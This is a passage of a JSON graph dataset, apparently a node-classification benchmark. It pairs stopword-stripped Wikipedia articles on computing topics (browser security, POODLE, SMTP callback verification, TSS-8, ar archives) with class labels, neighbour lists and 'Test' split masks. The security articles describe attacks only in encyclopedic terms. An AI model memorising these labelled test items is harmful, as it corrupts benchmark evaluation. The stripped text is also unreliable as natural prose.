spyware trojan horses gain access users personal computers via cracking malware including online banking theft using man-in-the-browser attacks vulnerabilities web browser software minimized keeping browser software updated sufficient underlying operating system compromised example rootkit subcomponents browsers scripting add-ons cookies particularly vulnerable confused deputy problem also need addressed following principle defence depth fully patched correctly configured browser may sufficient ensure browser-related security issues occur example rootkit capture keystrokes someone logs banking website carry man-in-the-middle attack modifying network traffic web browser dns hijacking dns spoofing may used return false positives mistyped website names subvert search results popular search engines malware rsplug simply modifies system configuration point rogue dns servers browsers use secure methods network communication help prevent attacks perimeter defenses typically firewalls use filtering proxy servers block malicious websites perform antivirus scans file downloads commonly implemented best practice large organizations block malicious network traffic reaches browser topic browser security grown point spawning creation entire organizations browser exploitation framework project creating platforms collect tools breach browser security ostensibly order test browsers network systems vulnerabilities although part browser per se browser plugins extensions extend attack surface exposing vulnerabilities adobe flash player adobe acrobat reader java plugin activex commonly exploited malware may also implemented browser extension browser helper object case internet explorer browsers like google chrome mozilla firefox block—or warn users of—insecure plugins august 2009 study social science research network found 50 websites using flash also employing flash cookies yet privacy policies rarely disclosed user controls privacy preferences lacking browsers cache history delete functions affect flash player writing local shared objects cache user community much less aware existence function flash cookies http cookies thus users deleted http cookies purged browser history files caches may believe purged tracking data computers fact flash browsing history remains well manual removal betterprivacy addon firefox remove flash cookies adblock plus used filter specific threats flashblock used give option allowing content otherwise trusted sites charlie miller recommended install flash computer security conference cansecwest several security experts also recommend either install adobe flash player block contents web page arbitrary controlled entity owning domain named displayed address bar https used encryption used secure attackers access network changing page contents en route presented password field web page user supposed look address bar determine whether domain name address bar correct place send password example google single sign-on system used e.g youtube.com user always check address bar says nowiki https //accounts.google.com /nowiki inputting password un-compromised browser guarantees address bar correct guarantee one reason browsers generally display warning entering fullscreen mode top address bar would normally fullscreen website make fake browser user interface fake address bar attempts market hardware-based browsers running non-writable read-only file systems data stored device media overwritten presenting clean executable time loads first device zeusgard secure hardware browser released late 2013 zeusgard website functional since mid-2016 another device icloak® stik icloak website provides complete live os completely replaces computer entire operating system offers two web browsers read-only system icloak provide tor browser anonymous browsing well regular firefox browser non-anonymous browsing non-secured web traffic using https example could still subject man-in-the-middle alteration network traffic-based manipulations livecds run operating system non-writable source typically come web browsers part default image original livecd image free malware software used including web browser load free malware every time livecd image booted one effective ways browse web safely use browser patches avoid cross-origin resource sharing vulnerability example patches provided webkit-based browsers browsing world wide web least-privilege user account i.e without administrator privileges limits ability security exploit web browser compromising whole operating system internet explorer 4 later allows blacklisting whitelisting activex controls add-ons browser extensions various ways internet explorer 7 added protected mode technology hardens browser application security sandboxing feature windows vista called mandatory integrity control google chrome provides sandbox limit web page access operating system suspected malware sites reported google confirmed google flagged hosting malware certain browsers third-party extensions plugins available harden even latest browsers older browsers operating systems whitelist-based software noscript block javascript adobe flash used attacks privacy allowing users choose sites know safe adblock plus also uses whitelist ad filtering rules subscriptions though software filtering list maintainers come controversy by-default allowing sites pass pre-set filters us-cert recommends block flash using noscript modern web browsers undergo extensive fuzzing uncover vulnerabilities chromium code google chrome continuously fuzzed chrome security team 15,000 cores microsoft edge internet explorer microsoft performed fuzzed testing 670 machine-years product development generating 400 billion dom manipulations 1 billion html files",
    "neighbors": [
      3072,
      2049,
      6657,
      5636,
      10245,
      10756,
      9227,
      9744,
      9233,
      2579,
      4119,
      9242,
      4637,
      9761,
      2084,
      4648,
      9256,
      9770,
      6699,
      9771,
      46,
      559,
      2611,
      4661,
      3639,
      11319,
      10297,
      7739,
      9791,
      64,
      1088,
      4165,
      5707,
      10828,
      81,
      10834,
      10835,
      8789,
      6231,
      6747,
      4198,
      1642,
      107,
      9834,
      115,
      3700,
      4725,
      9843,
      4728,
      10875,
      5245,
      1664,
      6786,
      5764,
      5254,
      138,
      3724,
      9356,
      4245,
      10392,
      1690,
      10910,
      8351,
      5281,
      2213,
      7340,
      9394,
      9908,
      11449,
      5818,
      4797,
      8387,
      10952,
      11466,
      7885,
      2262,
      4310,
      10457,
      4314,
      8923,
      6368,
      737,
      6371,
      4326,
      8939,
      10477,
      4344,
      3320,
      8443,
      10492,
      5886,
      4863,
      1279,
      9987,
      6917,
      7943,
      7441,
      8978,
      3347,
      4883,
      2325,
      278,
      7449,
      6938,
      3867,
      7965,
      10015,
      1830,
      8998,
      1834,
      10026,
      300,
      7996,
      11583,
      3395,
      2887,
      10057,
      845,
      7515,
      8032,
      9569,
      7012,
      3941,
      11621,
      4972,
      877,
      4462,
      8557,
      8054,
      9591,
      9087,
      6528,
      3971,
      7044,
      3462,
      8584,
      6028,
      9102,
      5524,
      7572,
      10141,
      8094,
      9630,
      5536,
      10657,
      5026,
      939,
      6576,
      1970,
      11188,
      4023,
      6588,
      9664,
      9154,
      8133,
      2508,
      4048,
      5078,
      3032,
      988,
      9187,
      5605,
      487,
      8169,
      7659,
      494,
      1520,
      4081,
      7152,
      5624,
      2041,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 3644,
    "label": 1,
    "text": "OpenInsight:openinsight openinsight database application development tool revelation technologies first released 1992 current version 10.0.1 released march 2018 openinsight windows-based development tool contains database type post-relational database known multivalue database openinsight contains tools creating database applications run windows workstations windows linux novell networks browser-based applications tools include limited table builder database manager editor debugger programming language forms designer creating data entry forms user interface tools reporting tools deployment tools openinsight programming language called basic+ extension dialect basic programming language openinsight applications use data revelation software built-in database use data sql databases rocket software rocket u2 databases well tigerlogic d3 database",
    "neighbors": [
      5929,
      8340,
      6797,
      7983
    ],
    "mask": "None"
  },
  {
    "node_id": 3645,
    "label": 4,
    "text": "Callback_verification:callback verification callback verification also known callout verification sender address verification technique used smtp software order validate e-mail addresses common target verification sender address message envelope address specified smtp dialogue mail mostly used anti-spam measure since large percentage e-mail spam generated forged sender mfrom addresses spam detected checking whether forging resulted invalid address using method related technique call forwards secondary firewall mail exchanger verify recipients primary mail exchanger domain order decide whether address deliverable receiving mail server verifies sender address verifying parts sender address domain name part character local part part character first step establish successful smtp connection mail exchanger sender address mail exchanger found looking mx records domain dns zone second step query exchanger make sure accepts address valid one done way sending email address however process stopped mail exchanger accepts rejects recipient address steps receiving mail server would take bounce mail back sender however case mail sent smtp commands sent equivalently mail rcpt commands replaced vrfy command however vrfy command required supported usually disabled modern mtas techniques technically compliant relevant smtp rfcs rfc 5321 however rfc 2505 best current practice recommends default disabling vrfy command prevent directory harvest attacks one widespread interpretation implies mail from/rcpt pair commands also respond way stated rfcs documentation postfix exim caution use technique mention many limitations smtp callbacks particular many situations either ineffective causes problems systems receive callbacks problems caused originating systems violating stretching limits rfcs verification problems reflecting problems back senders like unintentionally used invalid addresses rejection null sender greylisting example delay caused verifying recipient closely related delay caused originator many cases turn helps originator system detect problems fix like unintentionally able receive valid bounces several problems reduced caching verification results particular systems give useful information rejecting rcpt time catch-all e-email etc remembered future call backs systems need made also results positive negative specific e-mail addresses remembered mtas like exim caching built",
    "neighbors": [
      8224,
      2339,
      6762,
      9053,
      8337,
      9909,
      10906,
      6492,
      3549,
      2527
    ],
    "mask": "Test"
  },
  {
    "node_id": 3646,
    "label": 0,
    "text": "Cache_language_model:cache language model cache language model type statistical language model occur natural language processing subfield computer science assign probabilities given sequences words means probability distribution statistical language models key components speech recognition systems many machine translation systems tell systems possible output word sequences probable improbable particular characteristic cache language model contains cache component assigns relatively high probabilities words word sequences occur elsewhere given text primary means sole use cache language models speech recognition systems understand good idea statistical language model contain cache component one might consider someone dictating letter elephants speech recognition system standard non-cache n-gram language models assign low probability word elephant rare word english speech recognition system contain cache component person dictating letter may annoyed time word elephant spoken another sequence words higher probability according n-gram language model may recognized e.g. tell plan erroneous sequences deleted manually replaced text elephant time elephant spoken system cache language model elephant still probably misrecognized first time spoken entered text manually however point system aware elephant likely occur – estimated probability occurrence elephant increased making likely spoken recognized correctly elephant occurred several times system likely recognize correctly every time spoken letter completely dictated increase probability assigned occurrence elephant example consequence machine learning specifically pattern recognition exist variants cache language model single words also multi-word sequences occurred previously assigned higher probabilities e.g. san francisco occurred near beginning text subsequent instances would assigned higher probability cache language model first proposed paper published 1990 ibm speech-recognition group experimented concept group found implementation form cache language model yielded 24 drop word-error rates first hundred words document dictated detailed survey language modeling techniques concluded cache language model one new language modeling techniques yielded improvements standard n-gram approach caching results show caching far useful technique perplexity reduction small medium training data sizes development cache language model generated considerable interest among concerned computational linguistics general statistical natural language processing particular recently interest applying cache language model field statistical machine translation success cache language model improving word prediction rests human tendency use words bursty fashion one discussing certain topic certain context frequency one uses certain words quite different frequencies one discussing topics contexts traditional n-gram language models rely entirely information small number four three two words preceding word probability assigned adequately model burstiness recently cache language model concept originally conceived n-gram statistical language model paradigm adapted use neural paradigm instance recent work continuous cache language models recurrent neural network rnn setting applied cache concept much larger contexts yielding significant reductions perplexity another recent line research involves incorporating cache component feed-forward neural language model fn-lm achieve rapid domain adaptation",
    "neighbors": [
      1890,
      2339,
      7780,
      6798,
      8688,
      1044,
      3323,
      7164,
      10557,
      3998
    ],
    "mask": "Test"
  },
  {
    "node_id": 3647,
    "label": 7,
    "text": "Iamus_(computer):iamus computer iamus computer cluster half-cabinet encased custom shell located universidad de málaga powered melomics technology composing module iamus takes 8 minutes create full composition different musical formats although native representation obtained whole system less second average iamus composes full pieces contemporary classical music iamus opus one created october 15 2010 first fragment professional contemporary classical music ever composed computer style rather attempting emulate style existing composers previously done david cope iamus first full composition hello world premiered exactly one year creation opus one october 15 2011 four iamus works premiered july 2 2012 broadcast live school computer science universidad de málaga part events included alan turing year compositions performed event later recorded london symphony orchestra creating album iamus new scientist reported first complete album composed solely computer recorded human musicians commenting authenticity music stephen smoliar critic classical music san francisco examiner commented primary act making music engaged performers listener responds performers ... interesting documents generated iamus capacity challenge creative talents performing musicians",
    "neighbors": [
      8569,
      7983,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 3648,
    "label": 2,
    "text": "Transactional_NTFS:transactional ntfs transactional ntfs abbreviated txf component introduced windows vista present later versions microsoft windows operating system brings concept atomic transactions ntfs file system allowing windows application developers write file-output routines guaranteed either succeed completely fail completely major operating system components including system restore task scheduler windows update rely txf stability development windows vista winfs also relied txf storing files due complexity various nuances developers need consider part application development microsoft considered deprecating txf application programming interfaces apis future version windows microsoft strongly recommended developers investigate using alternatives rather adopting transactional ntfs api platform may available future versions windows transactional ntfs allows files directories created modified renamed deleted atomically using transactions ensures correctness operation series file operations done transaction operation committed operations succeed case failure entire operation roll back fail transactional ntfs implemented top kernel transaction manager windows kernel component introduced windows vista provides transactioning objects kernel ntfs file system already supports journaling low-level operations writing block data transactional ntfs expands capability include exception read operations using transactional ntfs transactions encrypting file system files supported windows vista service pack 1 windows server 2008",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      1581,
      2101,
      10812,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      622,
      9839,
      4210,
      7796,
      9335,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      10048,
      3394,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 3649,
    "label": 2,
    "text": "Synaptic_(software):synaptic software synaptic gtk-based graphical user interface apt package manager used debian linux distribution derivatives synaptic usually used systems based deb packages also used systems based rpm packages used install remove upgrade software packages add repositories also following features package manager enables user install upgrade remove software packages install remove package user must search navigate package mark installation removal changes applied instantly user must first mark changes apply synaptic development funded conectiva asked alfredo kojima employee write graphical front-end apt continuing work initiated creation apt rpm back-end apt-rpm",
    "neighbors": [
      11394,
      11525,
      2310,
      10760,
      2955,
      7435,
      6413,
      7181,
      7947,
      2448,
      8209,
      8848,
      3859,
      10255,
      1813,
      6934,
      4887,
      6680,
      7450,
      8476,
      1822,
      3745,
      6691,
      5670,
      4775,
      6694,
      7847,
      6828,
      6445,
      6446,
      7341,
      7854,
      7983,
      1842,
      8621,
      9908,
      823,
      2872,
      6583,
      3131,
      10172,
      2239,
      10817,
      708,
      3015,
      9671,
      5067,
      4177,
      6227,
      4951,
      5721,
      2010,
      9564,
      5343,
      3300,
      3685,
      7140,
      3815,
      5096,
      1513,
      7913,
      4459,
      9324,
      10860,
      7920,
      6257,
      1138,
      1522,
      10096,
      6393
    ],
    "mask": "Test"
  },
  {
    "node_id": 3650,
    "label": 2,
    "text": "TSS-8:tss-8 tss-8 discontinued time-sharing operating system co-written witcraft john everett digital equipment corporation 1967 dec also referred timeshared-8 edusystem 50 operating system ran 12-bit pdp-8 computer released 1968 timesharing system like ibm call/os implemented language variants also supported dec focal developed specifically pdp 8/e provided algebraic language also desk calculator mode",
    "neighbors": [
      512,
      6529,
      1804,
      273,
      6675,
      8474,
      8732,
      9759,
      7076,
      8876,
      7983,
      6448,
      6837,
      8503,
      11075,
      8262,
      2507,
      10590,
      1253,
      9829,
      10475,
      5363,
      3960
    ],
    "mask": "Test"
  },
  {
    "node_id": 3651,
    "label": 2,
    "text": "William_Jolitz:william jolitz william frederick jolitz born february 22 1957 commonly known bill jolitz american software programmer best known developing 386bsd operating system 1989 1994 along wife lynne jolitz jolitz received ba computer science uc berkeley wife reside los gatos california children rebecca benjamin sarah",
    "neighbors": [
      7552,
      5506,
      1927,
      4745,
      10761,
      2061,
      9743,
      8725,
      5534,
      1316,
      684,
      4908,
      1839,
      7983,
      1718,
      1080,
      9151,
      9153,
      7748,
      10436,
      9927,
      8395,
      850,
      6361,
      9306,
      10202,
      3551,
      607,
      9320,
      873,
      9452,
      633,
      8316
    ],
    "mask": "Test"
  },
  {
    "node_id": 3652,
    "label": 2,
    "text": "Lynx_Software_Technologies:lynx software technologies lynx software technologies inc. formerly lynuxworks san jose california software company founded 1988 lynx software technologies specializes secure virtualization open reliable real-time operating system rtos originally known lynx real-time systems company changed name lynuxworks 2000 acquiring merging isdcorp integrated software devices corporation nine-year-old embedded systems company strong linux background may 2014 company changed name lynx software technologies representation company ’ forward direction lynxos rtos family products lynxsecure hypervisor continued gain increased traction current customers markets new internet connected embedded world lynx software technologies created technology successfully deployed thousands designs millions products made leading communications industrial transportation avionics aerospace/defense consumer electronics companies 1989 lynxos company flagship real-time operating system selected use nasa/ibm space station freedom project lynx software technologies operating systems also used medical industrial communications systems around world lynx software technologies held private 2000 company filed registration statement initial public offering later withdrew plans due unfavourable economic conditions lynxos company real-time operating system unix-compatible posix-compliant features predictable worst-case response time preemptive scheduling real-time priorities romable kernel memory locking lynxos 7.0 marketed military grade general purpose multi-core hard real-time operating system intended developers embed security features design process rather adding security features development security used protect user accessible also machine machine m2m based embedded devices utilizing access control lists audit quotas local trusted path account management trusted menu manager openpam 2000 lynx software technologies released first embedded linux distribution bluecat linux 1.0 specialized paravirtualized linux embedded systems virtualization 2003 company introduced lynxos-178 real-time operating system specialized version lynxos geared toward avionics applications require certification industry standards do-178b lynxos-178 commercial off-the-shelf cots rtos fully satisfies objectives do-178b level specification meets requirements integrated modular avionics developers lynxsecure hypervisor bare metal type 1 separation kernel released 2005 lynxsecure programmable processor partitioning system uses hardware virtualization capabilities modern multi-core processors isolate computing resources lynx software technologies patents lynxos technology include patent 5,469,571 operating system architecture using multiple priority light weight kernel task-based interrupt handling november 21 1995 patent 5,594,903 operating system architecture reserved memory space resident program code identified file system name space january 14 1997",
    "neighbors": [
      1350,
      998,
      4914,
      9366,
      823,
      8700,
      5247
    ],
    "mask": "None"
  },
  {
    "node_id": 3653,
    "label": 4,
    "text": "Scientific_Working_Group_on_Digital_Evidence:scientific working group digital evidence scientific working group digital evidence swgde brings together organizations actively engaged field digital multimedia evidence foster communication cooperation well ensure quality consistency within forensic community formed 1998 scientific working group digital evidence brings together law enforcement academic commercial organizations actively engaged field digital forensics develop cross-disciplinary guidelines standards recovery preservation examination digital evidence originally named technical working group twg digital evidence became swgde twgs renamed scientific working groups swgs 1999 order distinguish federal bureau investigation-supported long-term working groups national institute justice-supported short-term twgs swgs ongoing groups meet least per year federal state local members goal groups open lines communication law enforcement agencies forensic laboratories around world providing guidance use new innovative technologies techniques initial members swgde made federal forensic laboratories well representatives several agencies performed digital forensics outside traditional forensic laboratory soon representatives state local agencies invited participate today members federal state local law enforcement agencies academic organizations commercial entities first meeting swgde held july 1998 group defined digital evidence information probative value stored transmitted binary form includes digitized text numerals sound images video binary later changed digital swgde ’ earliest work explored principles digital forensics developed baseline definitions 1999 request group eight g8 international organization computer evidence ioce longer functioning organization swgde contributions authored set principles definitions group felt close universal possible principles published forensic science communications journal submitted g8 principles adopted g8 2001 2003 swgde published guidelines training best practices result efforts american society crime laboratory directors ascld approved digital evidence part accreditation process crime laboratories 2003 today discipline referred digital multimedia evidence comprises sub-disciplines computer forensics audio video imaging swgde membership presently consists approximately seventy maximum 100 forensic examiners scientists managers two dozen federal state local law enforcement agencies well representatives academic private research communities membership elects officers within swgde composed executive board eight standing committees ad-hoc committees appointed as-needed basis standing committees audio forensics computer forensics imaging photography quality standards video membership outreach imaging photography video committees added june 2015 scientific working group imaging technology swgit terminated operations swgde provides guidance digital forensic community publication standards guidelines best practices website swgde also encourages number published documents used standard developing organizations e.g astm international creation national international standards digital multimedia evidence one document become astm standard standard practice computer forensics astm e2763 additionally swgde may answer direct inquiries using letters position statements also typically posted website due rapidly evolving field digital forensics great deal debate regarding accreditation certification proficiency testing legislation digital forensic labs personnel tools swgde accredit certify approve qualify laboratories individuals swgde promotes establishment maintenance robust quality system publication relevant guidance documents position papers guidelines validation testing minimum requirements quality assurance swgde documents seek provide framework agencies insert criteria describe included protocol requiring particular format content swgde documents freely available community-at-large goal agencies wishing create improve digital evidence programs thoughtfully examine consider guidance documents first published draft version comment public provides public opportunity provide feedback changes objections portion document becomes final feedback reviewed accepted incorporated document published final version swgde invites interested parties review comment published draft final documents available website swgde published 40 guidance documents including joint documents swgit since inception addition releasing documents swgde members disseminate best practices law enforcement professionals digital multimedia evidence concerned carried attending lecturing meetings conferences various forensic organizations include",
    "neighbors": [
      9319
    ],
    "mask": "Test"
  },
  {
    "node_id": 3654,
    "label": 2,
    "text": "Ubuntu_JeOS:ubuntu jeos ubuntu jeos pronounced juice discontinued variant ubuntu described efficient variant ... configured specifically virtual appliances concept operating system look like context virtual appliance jeos stands enough operating system first release ubuntu jeos 7.10 since release ubuntu 8.10 included option part standard ubuntu server edition latest version jeos optimized virtualization technologies vmware inc. linux kernel-based virtual machine specifications version 8.10 include",
    "neighbors": [
      6153,
      546,
      9253,
      11305,
      56,
      59,
      4673,
      1101,
      1107,
      1110,
      4192,
      10851,
      3685,
      9320,
      9324,
      10860,
      2671,
      3189,
      5755,
      11388,
      8837,
      10394,
      673,
      3745,
      3245,
      7854,
      2738,
      4790,
      8907,
      8909,
      10971,
      5343,
      4841,
      6890,
      7913,
      5356,
      9964,
      7920,
      5363,
      9971,
      9461,
      8439,
      6393,
      5369,
      8957,
      5380,
      7435,
      2321,
      5397,
      4887,
      8476,
      5410,
      10530,
      6445,
      7983,
      2864,
      7483,
      3903,
      2375,
      8520,
      5962,
      4432,
      4951,
      2914,
      5990,
      9064,
      7020,
      7534,
      2930,
      9074,
      1396,
      1399,
      3969,
      10127,
      11669,
      3478,
      926,
      10149,
      8112,
      439,
      10687,
      4039,
      5067,
      975,
      8147,
      9693,
      3550,
      7134,
      6625,
      7140,
      485,
      8177,
      8700,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 3655,
    "label": 7,
    "text": "Kevin_L._Jackson:kevin l. jackson kevin l. jackson american business executive writer served us navy fifteen years becoming senior business executive computer industry jackson currently ceo founder govcloud network consultancy formed assist agencies businesses leverage parallel global nature cloud computing jackson graduated united states naval academy 1979 bs aerospace engineering later graduated naval war college national security strategic studies degree msee computer engineering navy postgraduate school 1979 1994 jackson officer united states navy specialized space systems engineering airborne logistics airborne command control aircraft carrier pilot time navy also served national reconnaissance office operational support office provides global logistical support marine corps navy also served us navy space technology program 1996 1999 jackson served chief technology officer sentel corporation winner nasa small business innovative research program direction 1997 jackson attended first annual international symposium wearable computers behalf company featured new york times coverage event january 1999 jackson wrote speech technology magazine first time nearly 40–year history wearable computers reality meet society expectations ... ideal wearable computer would provide seamless interface aural visual communication also remain accessible user mouth ears eyes throughout range daily activities leaving sentel jackson worked senior executive private sector including companies like ibm jp morgan chase also served vice president dataline llc february 2010 jackson became general manager cloud computing services njvc year jackson named cyber security visionary us black engineer magazine 1995-96 jackson co-produced interactive cd-rom black wings chronicle african americans aviation conjunction smithsonian institution cd covers contributions african-americans made aviation america narration montel williams since 2008 jackson run cloud-computing blog entitled cloud musings kevin jackson 2011 cloud computing journal named jackson blog one top 100 blogs cloud computing united states since march 2011 jackson also written cloud musing forbes blog forbes magazine covering growing use cloud computing public private sectors 2011 jackson co-authored government training book govcloud implementation cloud brokerage service philpott 2012 jackson released book follow-up govcloud ii implementation cloud brokerage service appeared author kansas city npr november 25 2012 discussed government mandates move us federal government cloud-based network jackson previously interviewed national npr regarding federal government push cloud-computing including december 2008 incoming us president barack obama made decision convert white house computer system cloud–computing kevin l. jackson globally recognized cloud computing expert dell powermore thought leader founder/author award winning “ cloud musings ” blog jackson also recognized “ top 100 cybersecurity influencer brand ” onalytica 2015 huffington post “ top 100 cloud computing experts twitter ” 2013 “ top 50 cloud computing blogger integrators ” crn 2015 “ top 5 must read cloud blog ” bmc software 2015 next publication “ practical cloud security cross industry view ” released taylor francis spring 2016",
    "neighbors": [
      4194,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 3656,
    "label": 6,
    "text": "Chiron_FS:chiron fs chiron filesystem fault-tolerant replication file system chiron fs fuse based filesystem implements replication filesystem level like raid 1 device level replicated filesystem may kind requisite mounted need special configuration files setup simple one mount command one line fstab specific communication protocol mount time invoking parameters indicate two paths directories replicated underlying filesystems must already sync allows client use kind underlying filesystems ext3 nfs sshfs even mix every write chiron fs mount point subtree echoed underlying filesystems read chiron fs mount point subtree made one underlying filesystems using prioritized round robin algorithm one underlying filesystems fails virtualized filesystem provided chiron fs continues operating long least one replica available case failures reported log file failure write operation failed replica disabled used chiron fs available resynchronized others synchronization implemented yet chiron fs must done manually replica fails calling application receives error message would receive accessing non replicated filesystem case log report",
    "neighbors": [
      9762,
      2395,
      2199
    ],
    "mask": "Test"
  },
  {
    "node_id": 3657,
    "label": 4,
    "text": "POODLE:poodle poodle attack stands padding oracle downgraded legacy encryption man-in-the-middle exploit takes advantage internet security software clients fallback ssl 3.0 attackers successfully exploit vulnerability average need make 256 ssl 3.0 requests reveal one byte encrypted messages bodo möller thai duong krzysztof kotowicz google security team discovered vulnerability disclosed vulnerability publicly october 14 2014 despite paper dated september 2014 december 8 2014 variation poodle vulnerability affected tls announced cve-id associated original poodle attack f5 networks filed well see poodle attack tls section poodle exemplifies vulnerability succeeds mechanism designed reducing security sake interoperability designing systems domains high levels fragmentation extra care appropriate domains graceful security degradation may become common mitigate poodle attack one approach completely disable ssl 3.0 client side server side however old clients servers support tls 1.0 thus authors paper poodle attacks also encourage browser server implementation tls_fallback_scsv make downgrade attacks impossible another mitigation implement anti-poodle record splitting splits records several parts ensures none attacked however problem splitting though valid according specification may also cause compatibility issues due problems server-side implementations full list browser versions levels vulnerability different attacks including poodle found article transport layer security opera 25 implemented mitigation addition tls_fallback_scsv google chrome browser servers already supported tls_fallback_scsv google stated october 2014 planning remove ssl 3.0 support products completely within months fallback ssl 3.0 disabled chrome 39 released november 2014 ssl 3.0 disabled default chrome 40 released january 2015 mozilla disabled ssl 3.0 firefox 34 esr 31.3 released december 2014 added support tls_fallback_scsv firefox 35 microsoft published security advisory explain disable ssl 3.0 internet explorer windows os october 29 2014 microsoft released fix disables ssl 3.0 internet explorer windows vista server 2003 announced plan disable ssl 3.0 default products services within months microsoft disabled fallback ssl 3.0 internet explorer 11 protect mode sites february 10 2015 sites april 14 2015 apple safari os x 10.8 ios 8.1 later mitigated poodle removing support cbc protocols ssl 3.0 however left rc4 also completely broken rc4 attacks ssl 3.0.. poodle completely mitigated os x 10.11 el capitan 2015 ios 9 2015 prevent poodle attack web services dropped support ssl 3.0 examples include cloudflare wikimedia network security services version 3.17.1 released october 3 2014 3.16.2.3 released october 27 2014 introduced support tls_fallback_scsv nss disable ssl 3.0 default april 2015 openssl versions 1.0.1j 1.0.0o 0.9.8zc released october 15 2014 introduced support tls_fallback_scsv libressl version 2.1.1 released october 16 2014 disabled ssl 3.0 default new variant original poodle attack announced december 8 2014 attack exploits implementation flaws cbc encryption mode tls 1.0 1.2 protocols even though tls specifications require servers check padding implementations fail validate properly makes servers vulnerable poodle even disable ssl 3.0 ssl pulse showed 10 servers vulnerable poodle attack tls vulnerability announced cve-id f5 networks implementation bug entry nist nvd states cve-id used f5 networks implementation tls vendors whose products failure validate padding mistake implementations like a10 networks cisco systems need issue cve-ids implementation errors flaw protocol flaw protocol implementation poodle attack tls found easier initiate initial poodle attack ssl need downgrade clients ssl 3.0 meaning fewer steps needed execute successful attack",
    "neighbors": [
      1024,
      513,
      5636,
      517,
      5647,
      9744,
      4117,
      8726,
      535,
      9761,
      2083,
      4644,
      4133,
      7736,
      9281,
      1608,
      8779,
      10831,
      11345,
      4703,
      7264,
      8288,
      8292,
      10341,
      2169,
      3707,
      10875,
      3711,
      8320,
      5764,
      1157,
      2187,
      6797,
      4240,
      1683,
      2709,
      1688,
      2717,
      3742,
      9375,
      8358,
      9904,
      6834,
      9394,
      9395,
      8886,
      9412,
      5834,
      3789,
      4304,
      4314,
      9435,
      3805,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      4863,
      2815,
      3843,
      10502,
      1288,
      10003,
      11044,
      297,
      2857,
      8489,
      11052,
      9518,
      11569,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      10622,
      8584,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      11693,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      5078,
      5590,
      474,
      8664,
      1504,
      8674,
      7139,
      9186,
      2542,
      5107,
      501,
      1526,
      507,
      510
    ],
    "mask": "Test"
  },
  {
    "node_id": 3658,
    "label": 3,
    "text": "Server_Base_System_Architecture:server base system architecture server base system architecture sbsa hardware system architecture servers based 64-bit arm processors attempts standardize pe arm processing element features key aspects system architecture specified features firmware os hypervisors rely enable suitably-built single os image run hardware compliant specification architecture compliance suite check system compliant sbsa specification available open source software downloaded https //github.com/arm-software/sbsa-acs",
    "neighbors": [
      9964
    ],
    "mask": "Test"
  },
  {
    "node_id": 3659,
    "label": 6,
    "text": "Ar_(Unix):ar unix archiver also known simply ar unix utility maintains groups files single archive file today codice_1 generally used create update static library files link editor linker uses generating .deb packages debian family used create archives purpose largely replaced codice_2 purposes static libraries implementation codice_1 included one gnu binutils linux standard base lsb codice_1 deprecated expected disappear future release standard rationale provided lsb include software development utilities specify .o .a file formats ar format never standardized modern archives based common format two main variants bsd system v initially known coff used well gnu elf windows historically variants including v6 v7 aix small big coherent vary significantly common format debian .deb archives use common format ar file begins global header followed header data section file stored within ar file data section 2 byte aligned would end odd offset newline '\\n 0x0a used filler file signature single field containing magic ascii string codice_5 followed single lf control character 0x0a file stored ar archive includes file header store information file common format follows numeric values encoded ascii values right-padded ascii spaces 0x20 headers include printable ascii characters line feeds archive containing text files therefore still appears text file members aligned even byte boundaries archive file member begins even byte boundary newline inserted files necessary nevertheless size given reflects actual size file exclusive padding due limitations file name length format gnu bsd variants devised different methods storing long filenames although common format suffer year 2038 problem many implementations ar utility may need modified future handle correctly timestamps excess 2147483647 bsd ar stores filenames right-padded ascii spaces causes issues spaces inside filenames 4.4bsd ar stores extended filenames placing string 1/ followed file name length file name field storing real filename front data section bsd ar utility traditionally handle building global symbol lookup table delegates task separate utility named ranlib inserts architecture-specific file named codice_6 first archive member system v ar uses '/ character 0x2f mark end filename allows use spaces without use extended filename stores multiple extended filenames data section file name // record referred future headers header references extended filename storing followed decimal offset start filename extended filename data section format // file simply list long filenames separated one lf characters note decimal offsets number characters line string number within // file system v ar uses special filename denote following data entry contains symbol lookup table used ar libraries speed access symbol table built three parts recorded together contiguous data system v systems use format described symbol lookup table operating systems hp-ux 11.0 information stored data structure based som file format special file terminated specific sequence end assumed last symbol name read windows variation adds second special stores extended symbol cross-reference table stored sorted using little-endian integers overcome 4 gib file size limit operating system like solaris 11.2 use variant instead 32-bit integers 64-bit integers used symbol lookup tables furthermore string /sym64/ instead used identifier table create archive files class1.o class2.o class3.o following command would used unix linkers usually invoked c compiler codice_7 read codice_1 files extract object files codice_9 archive containing codice_10 codice_11 codice_12 libclass.a placed standard library path like /usr/local/lib linking",
    "neighbors": [
      515,
      9733,
      9735,
      6664,
      521,
      7196,
      2599,
      3114,
      8236,
      2095,
      10817,
      5706,
      10317,
      4174,
      5711,
      10857,
      8306,
      5754,
      5759,
      5256,
      6281,
      4750,
      2198,
      3222,
      6812,
      7847,
      7356,
      2755,
      2245,
      1741,
      722,
      10967,
      9946,
